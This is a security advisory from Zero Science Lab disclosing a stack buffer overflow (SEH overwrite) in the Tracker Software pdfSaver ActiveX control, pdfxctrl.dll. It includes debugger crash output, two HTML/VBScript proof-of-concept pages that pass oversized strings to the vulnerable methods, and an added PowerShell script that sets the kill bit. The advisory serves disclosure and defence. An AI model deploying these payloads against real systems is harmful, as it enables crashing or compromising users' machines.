Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)
Source: http://www.zeroscience.mk  Author: LiquidWorm  Published: 2012-02-01
Vendor:
-------
Tracker Software Products Ltd.
Product web page:
-----------------
http://www.tracker-software.com
Affected version:
-----------------
3.60.0128
Summary:
--------
PDF-Saver Technology is a unique new feature of PDF-XChange software
which allows printing jobs to be combined prior to the final PDF file
being generated - (e.g. to join 3 pages of Excel spreadsheet, 5 slides
of PowerPoint presentation and 10 pages of Word document into one PDF
document).
Description:
------------
The PDF Printer Preferences ActiveX control suffers from a stack-based buffer
overflow. When an overly long string is passed as the sub_path parameter of
the StoreInRegistry method, or as the sub_key parameter of the
InitFromRegistry method, in the pdfxctrl.dll module, the SEH chain is
overwritten (the debugger output below shows the handler replaced with
41414141). An attacker can gain access to the affected system and execute
arbitrary code.
------------------------------------------------------------------------
(1fac.1ea8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0013e9e0 ebx=00000003 ecx=0000008c edx=00001815 esi=0013cd74 edi=0013fffd
eip=7c834d8f esp=0013b75c ebp=0013b780 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
kernel32!lstrcatA+0x36:
7c834d8f f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !exchain
0013b770: kernel32!_except_handler3+0 (7c839ac0)
  CRT scope  0, filter: kernel32!lstrcatA+45 (7c84086d)
                func:   kernel32!lstrcatA+49 (7c840876)
0013f1ac: 41414141
Invalid exception stack at 41414141
0:000> d esp
0013b75c  2a 30 00 00 cc 63 18 00-03 00 00 00 5c b7 13 00  *0...c......\...
0013b76c  2a 30 00 00 ac f1 13 00-c0 9a 83 7c a8 4d 83 7c  *0.........|.M.|
0013b77c  00 00 00 00 e4 ed 13 00-e7 d8 01 10 e0 e9 13 00  ................
0013b78c  90 b7 13 00 41 41 41 41-41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
0013b79c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0013b7ac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0013b7bc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0013b7cc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
------------------------------------------------------------------------
Tested on:
----------
Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by:
----------------------------
Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
Advisory ID:
------------
ZSL-2012-5067
Advisory URL:
-------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php
25.01.2012
PoC (COMRaider):
----------------
<object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' />
<script language='vbscript'>
targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll"
prototype  = "Sub StoreInRegistry ( ByVal page_id As PdfPrinterDialogPage ,  ByVal sub_path As String )"
memberName = "StoreInRegistry"
progid     = "pdfxctrlLib.PdfPrinterPreferences"
argCount   = 2
arg1=1
arg2=String(6164, "A")
zsl.StoreInRegistry arg1 ,arg2
</script>
--------------------
<object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' />
<script language='vbscript'>
targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll"
prototype  = "Sub InitFromRegistry ( ByVal page_id As PdfPrinterDialogPage ,  ByVal sub_key As String )"
memberName = "InitFromRegistry"
progid     = "pdfxctrlLib.PdfPrinterPreferences"
argCount   = 2
arg1=1
arg2=String(14356, "A")
zsl.InitFromRegistry arg1 ,arg2
</script>
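As an added defender's example (not part of the advisory or of the vendor's code), the following PowerShell script checks whether the control from the PoC's CLSID is registered and sets the Internet Explorer kill bit for it, so the PdfPrinterPreferences object can no longer be instantiated from a web page. The registry location and the 0x400 "Compatibility Flags" value are Microsoft's documented kill-bit mechanism; the script assumes an elevated prompt.

```powershell
# Added example: set the IE kill bit for the pdfxctrl.dll control (CLSID from
# the advisory's PoC). Run from an elevated PowerShell prompt.
$Clsid = '{2EE01CFA-139F-431E-BB1D-5E56B4DCEC18}'
$KillBitFlag = 0x400   # documented kill-bit value for "Compatibility Flags"

function Get-ActiveXKillBitPath {
    param([string]$Clsid, [switch]$Wow6432)
    # 32-bit IE on 64-bit Windows reads the Wow6432Node view
    $base = if ($Wow6432) { 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
            else          { 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' }
    Join-Path $base $Clsid
}

function Test-ActiveXKillBit {
    param([string]$Clsid, [switch]$Wow6432)
    $path = Get-ActiveXKillBitPath -Clsid $Clsid -Wow6432:$Wow6432
    if (-not (Test-Path $path)) { return $false }
    $flags = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return [bool]($flags -band $KillBitFlag)
}

function Set-ActiveXKillBit {
    param([string]$Clsid, [switch]$Wow6432)
    $path = Get-ActiveXKillBitPath -Clsid $Clsid -Wow6432:$Wow6432
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    $current = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    # Preserve any other compatibility flags already present; only OR in the kill bit.
    Set-ItemProperty -Path $path -Name 'Compatibility Flags' -Value ([int]($current -bor $KillBitFlag)) -Type DWord
}

# Report whether the vulnerable control is registered on this host at all.
$registered = Test-Path "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
Write-Host "Control $Clsid registered: $registered"

# Apply to the native view, and to the Wow6432Node view on 64-bit Windows.
$views = @($false)
if ([Environment]::Is64BitOperatingSystem) { $views += $true }
foreach ($w in $views) {
    $label = if ($w) { 'Wow6432Node view' } else { 'native view' }
    if (Test-ActiveXKillBit -Clsid $Clsid -Wow6432:$w) {
        Write-Host "Kill bit already set in $label"
    } else {
        Set-ActiveXKillBit -Clsid $Clsid -Wow6432:$w
        Write-Host "Kill bit set in $label"
    }
}
```

The kill bit only blocks instantiation from Internet Explorer and other hosts that honour it; it does not patch pdfxctrl.dll itself, so updating or removing the affected version remains the actual fix.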